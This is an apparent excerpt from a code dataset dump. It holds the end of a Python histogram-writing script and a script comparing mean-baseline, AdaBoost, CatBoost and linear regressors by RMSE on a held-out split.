hist, bin_edges = np.histogram(Xi2_all, bins=50, density=True)
for i in range(0,len(hist)):
    hist_string=str(str(bin_edges[i])+" "+str(hist[i])+"\n")
    outfile4.write(hist_string)
outfile4.close()
hist, bin_edges = np.histogram(Xj2_all, bins=50, density=True)
for i in range(0,len(hist)):
    hist_string=str(str(bin_edges[i])+" "+str(hist[i])+"\n")
    outfile5.write(hist_string)
outfile5.close()
991,499 | f06972da07df5266400b718fb2f969c5e34a1459 | from functions import *
# Compare regressors (mean baseline, AdaBoost, CatBoost, linear) by RMSE
# on a held-out test split.
df, target = get_dataset()
X_train, X_test, y_train, y_test = train_test_split(df, target, test_size=0.33, random_state=42)

# Baseline: predict the training-set mean for every test sample.
mean_value = np.mean(y_train)
print(mean_value)
y_pred_mean = [mean_value] * len(y_test)
# Bug fix: the baseline RMSE was computed but its value was discarded;
# report it so the models below have a reference point.
baseline_rmse = mean_squared_error(y_test, y_pred_mean, squared=False)
print(baseline_rmse)

# AdaBoost regressor.
model = AdaBoostRegressor(learning_rate=0.01, n_estimators=100)
model.fit(X_train, y_train)
predictions = model.predict(X_test)  # fixed 'predicitons' typo
rmse = mean_squared_error(y_test, predictions, squared=False)
print(rmse)

# CatBoost regressor (reports RMSE on the eval_set while training).
model = CatBoostRegressor(iterations=1000, random_seed=42, loss_function='RMSE', logging_level='Verbose')
model.fit(
    X_train, y_train,
    eval_set=(X_test, y_test),
    logging_level='Verbose',  # you can uncomment this for text output
    plot=True,
)

# Ordinary least squares baseline model.
model = LinearRegression()
model.fit(X_train, y_train)
y_pred = model.predict(X_test)
rmse = mean_squared_error(y_test, y_pred, squared=False)
print(rmse)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.